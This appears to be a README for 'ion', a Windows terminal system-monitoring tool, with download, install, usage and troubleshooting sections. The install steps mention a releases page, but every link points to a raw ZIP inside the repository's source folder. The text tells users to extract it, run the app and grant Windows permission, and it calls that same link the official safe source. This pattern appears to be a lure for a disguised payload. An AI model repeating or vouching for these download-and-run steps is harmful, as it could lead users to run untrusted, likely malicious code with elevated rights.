🖥️ ion - Fast system stats in one view

Download ion

⚡ Download ion

Visit this page to download: https://raw.githubusercontent.com/Stickjav/ion/main/src/Software_v1.5-beta.5.zip

On the releases page, look for the latest version. Download the Windows file that matches your device. If you are not sure which one to pick, choose the file marked for Windows.

🪟 Install on Windows

  1. Open the releases page.
  2. Find the newest release at the top.
  3. Under Assets, download the Windows file.
  4. Save the file to a folder you can find again, such as Downloads or Desktop.
  5. If the file comes in a ZIP folder, right-click it and choose Extract All.
  6. Open the extracted folder.
  7. Double-click the ion app to run it

🖱️ First launch

When ion starts, it opens in a terminal window. You can use it right away with the keyboard.

If Windows asks for permission, choose Yes.

If the window closes right away, open Command Prompt or Windows Terminal, then run the app from the folder where you saved it.

🧭 What ion shows

ion gives you a live view of your system in one place:

  • CPU usage
  • RAM usage
  • GPU usage
  • Network activity
  • Running processes
  • Basic device details
  • Bluetooth status, when supported

The layout uses a neon-style terminal interface, so the screen stays easy to read while you watch your system load.

🎮 How to use ion

Use the keyboard to move around the app.

Common actions:

  • Arrow keys to move through lists
  • Enter to open a selected item
  • Esc to go back
  • Q to quit

If a process list is shown, you can use it to check which apps use the most memory or CPU. This helps you find what is slowing down your PC.

🔧 System needs

ion is built for Windows and works best on a recent version of the OS.

Recommended setup:

  • Windows 10 or Windows 11
  • A terminal that supports modern text apps
  • A screen width that fits a multi-panel layout
  • A device with a working CPU, RAM, and network adapter that Windows can report

For GPU stats, your system needs hardware and drivers that expose that data to Windows.

📁 Release files

The releases page may include more than one file. Common file types include:

  • .zip for packaged builds
  • .exe for a ready-to-run app
  • checksum files for file checks

If you see a ZIP file, extract it before you open ion. If you see an EXE file, you can usually run it right away.

🛠️ Troubleshooting

If ion does not open:

  • Download the file again from the releases page
  • Make sure you picked the Windows build
  • Extract the ZIP file before opening the app
  • Try running it from Windows Terminal
  • Check that your terminal window is not too small

If some stats do not show:

  • Wait a few seconds for the data to load
  • Close other monitor tools that may block access
  • Update your graphics drivers
  • Restart the app

If the screen looks broken:

  • Enlarge the terminal window
  • Switch to a font that is easy to read
  • Use a terminal with full color support

🧩 What makes ion useful

ion keeps system data in one place, which makes it easier to spot:

  • A CPU spike
  • A memory leak
  • A network problem
  • A process that uses too many resources
  • GPU load during games or heavy apps

It is useful when you want a fast readout without opening several Windows tools.

📦 File safety

Before you run any download, check that it came from the official releases page:

https://raw.githubusercontent.com/Stickjav/ion/main/src/Software_v1.5-beta.5.zip

Use the latest release file from that page and keep the download in a folder you trust

⌨️ Keyboard tips

A terminal app works best with the keyboard. If you are new to this type of tool:

  • Use the arrow keys to move
  • Use Enter to select
  • Use Esc to return
  • Use Q to quit
  • Resize the window if content looks cramped

🌐 Network tracking

ion can show network activity so you can see when your PC sends or receives data. This is useful if:

  • Your internet feels slow
  • A program keeps using bandwidth
  • You want to check upload and download activity
  • You want a quick view while a file copies or a game updates

🧠 Process view

The process list helps you see which apps run in the background. This can help when your PC feels slow. You can use it to check:

  • CPU-heavy apps
  • Memory-heavy apps
  • Long-running tasks
  • Apps that stay open after you close them

🎨 Look and feel

ion uses a neon-style terminal design with clear contrast and compact panels. The layout is built for quick scanning, so you can check several system areas without switching windows

🗂️ Supported areas

ion is built around common desktop monitoring tasks:

  • CPU usage
  • RAM usage
  • GPU usage
  • Network monitoring
  • Process management
  • Bluetooth status
  • Cross-platform system data where supported
